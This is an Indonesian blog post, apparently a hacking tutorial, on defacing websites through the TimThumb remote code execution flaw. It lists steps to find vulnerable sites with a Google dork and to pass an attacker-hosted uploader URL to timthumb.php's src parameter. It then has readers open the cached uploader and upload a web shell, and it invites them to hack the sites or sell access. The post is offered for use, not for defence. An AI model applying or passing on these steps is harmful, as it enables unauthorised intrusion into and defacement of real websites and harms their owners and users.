Deface Timthumb

Cara deface exploit timthumb rce (remote code execution)

Halo mitra :). Kali ini admin gans mau menawarkan tutorial deface dengan metode Timthumb RCE. Ingat poc ini cuma dapat bekerja pada Timthumb versi 2.0 kebawah. Langsung aja simak.

Dork:
Monggo dicomot mas

Untuk exploitnya ambil aja neh gan
Exploit by me xD: http://flickr.com.irfanmuhluster.web.id/upgan.php

1. Gunakan dork untuk cari sasaran kemudian cari sasaran dengan memakai dork diatas di google
2. Tambahkan timthumb.php di sasaran mu pola targetmu.com/wp-content/themes/eNews/timthumb.php atau targetmu.com/timthumb.php
3. Cek versi timthumb bila versi 2.0 keatas skip aja h3h3h3

4. Masukan exploitnya > http://flickr.com.irfanmuhluster.web.id/upgan.php pola targetmu.com/timthumb.php?src=http://flickr.com.irfanmuhluster.web.id/upgan.php
5. Jika berhasil maka akan muncul menyerupai ini

6. Akses uploadernya caranya salin di bab /cache/random_nomor.php > ganti timthumb.php dengan /cache/random_nomor.php
Contoh: targetmu.com/cache/random_nomor.php

7. Tinggal upload shell kesayangan mu :D

Terakhir terserah kalian mau apain mau di hek jg boleh hehehe mau jual aksesna jg boleh hehehe

Sekian tutorial dari ku :)

Sumber https://nyamukdisc0de.blogspot.com/

Share this Article